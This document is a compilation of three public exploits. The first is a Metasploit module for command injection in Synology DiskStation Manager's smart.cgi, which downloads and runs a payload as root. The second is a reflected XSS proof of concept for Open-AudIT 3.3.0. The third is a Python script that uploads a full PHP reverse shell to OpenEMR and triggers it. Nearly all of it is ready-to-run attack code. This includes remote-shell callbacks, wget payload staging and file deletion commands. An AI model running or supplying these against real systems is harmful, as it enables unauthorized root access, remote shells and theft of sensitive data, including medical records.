## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::FileDropper DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+) &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze def initialize(info = {}) super( update_info( info, 'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability found in Synology DiskStation Manager (DSM) versions < 5.2-5967-5, which allows the execution of arbitrary commands under root privileges after website authentication. The vulnerability is located in webman/modules/StorageManager/smart.cgi, which allows appending of a command to the device to be scanned. However, the command with drive is limited to 30 characters. A somewhat valid drive name is required, thus /dev/sd is used, even though it doesn't exist. To circumvent the character restriction, a wget input file is staged in /a, and executed to download our payload to /b. From there the payload is executed. A wfsdelay is required to give time for the payload to download, and the execution of it to run. }, 'Author' => [ 'Nigusu Kassahun', # Discovery 'h00die' # metasploit module ], 'References' => [ [ 'CVE', '2017-15889' ], [ 'EDB', '43190' ], [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ], [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ] ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => ['python'], 'Arch' => [ARCH_PYTHON], 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PrependMigrate' => true, 'WfsDelay' => 10 }, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 08 2017' ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']), OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']), OptString.new('PASSWORD', [true, 'The Password for Synology', '']) ] ) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]) ] end def check vprint_status('Trying to detect installed version') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'), 'vars_get' => { 'host' => '' } }) if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}" build = $LAST_MATCH_INFO[:build] model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else vprint_error('Detection failed') return CheckCode::Unknown end vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1' return CheckCode::Appears when '5.2' return CheckCode::Appears if build < '5967-5' end CheckCode::Safe end def on_request_uri(cli, _request, cookie, token) print_good('HTTP Server request received, sending payload') send_response(cli, payload.encoded) print_status('Executing payload') inject_request(cookie, token, 'python b') end def inject_request(cookie, token, cmd = '') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'), 'cookie' => cookie, 'headers' => { 'X-SYNO-TOKEN' => token }, 'vars_post' => { 'action' => 'apply', 'operation' => 'quick', 'disk' => "/dev/sd`#{cmd}`" } }) end def login # If you try to debug login through the browser, you'll see that desktop.js calls # ux-all.js to do an RSA encrypted login. # Wowever in a stroke of luck Mrs. h00die caused # a power sag while tracing/debugging the loging, causing the NAS to power off. # when that happened, it failed to get the crypto vars, and defaulted to a # non-encrypted login, which seems to work just fine. greetz Mrs. h00die! res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'), 'vars_get' => { 'enable_syno_token' => 'yes' }, 'vars_post' => { 'username' => datastore['USERNAME'], 'passwd' => datastore['PASSWORD'], 'OTPcode' => '', '__cIpHeRtExT' => '', 'client_time' => Time.now.to_i, 'isIframeLogin' => 'yes' } }) if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body result = JSON.parse(json) fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error' if result['result'] == 'success' return res.get_cookies, result['SynoToken'] end fail_with(Failure::Unknown, "Unknown response: #{result}") end end def exploit unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if datastore['SRVHOST'] == '0.0.0.0' fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') end begin print_status('Attempting Login') cookie, token = login start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req, cookie, token) end, 'Path' => '/' } }) print_status('Cleaning env') inject_request(cookie, token, cmd = 'rm -rf /a') inject_request(cookie, token, cmd = 'rm -rf b') command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//) command_space = 22 - "echo -n ''>>/a".length command_space -= 1 command.each_slice(command_space) do |a| a = a.join('') vprint_status("Staging wget with: echo -n '#{a}'>>/a") inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a") end print_status('Requesting payload pull') register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b') register_file_for_cleanup('/a') inject_request(cookie, token, cmd = 'wget -i /a -O b') # at this point we let the HTTP server call the last stage # wfsdelay should be long enough to hold out for everything to download and run rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end

# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) # Date: 2020-04-26 # Exploit Author: Kamaljeet Kumar # Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/ # Software Link: https://www.open-audit.org/downloads.php # Version: 3.3.0 # CVE : CVE-2020-12261 # POC: Step 1: Login to Open-Audit Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "<svg><animate onend=alert(1) attributeName=x dur=1s>" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s> Then we get the XSS pop up.

# Title: OpenEMR 5.0.1 - Remote Code Execution (1) # Exploit Author: Musyoka Ian # Date: 2020-05-25 # Title: OpenEMR < 5.0.1 - Remote Code Execution # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 # References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69 # openemr_exploit.py #!/usr/bin/env python2 # -*- coding: utf-8 -*- import requests import time auth = "[+] Authentication with credentials provided please be patient" upload = "[+] Uploading a payload it will take a minute" netcat = "[+] You should be getting a shell" s = requests.Session() payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """<?php set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; # CHANGE THIS $port = 9001; # CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> """} print (auth) url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default" data= { 'new_login_session_management' : '1', 'authProvider' : 'Default', 'authUser' : 'admin', # change this to the the appropriate username 'clearPass' : 'password123', # change this to the appropriate password 'languageChoice' : '1', } response = s.post(url, data=data,).text time.sleep(2) print (upload) time.sleep(2) resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload) time.sleep(2) print (netcat) rev_shell = s.get("http://localhost/openemr/portal/shell.php") print (rev_shell.text)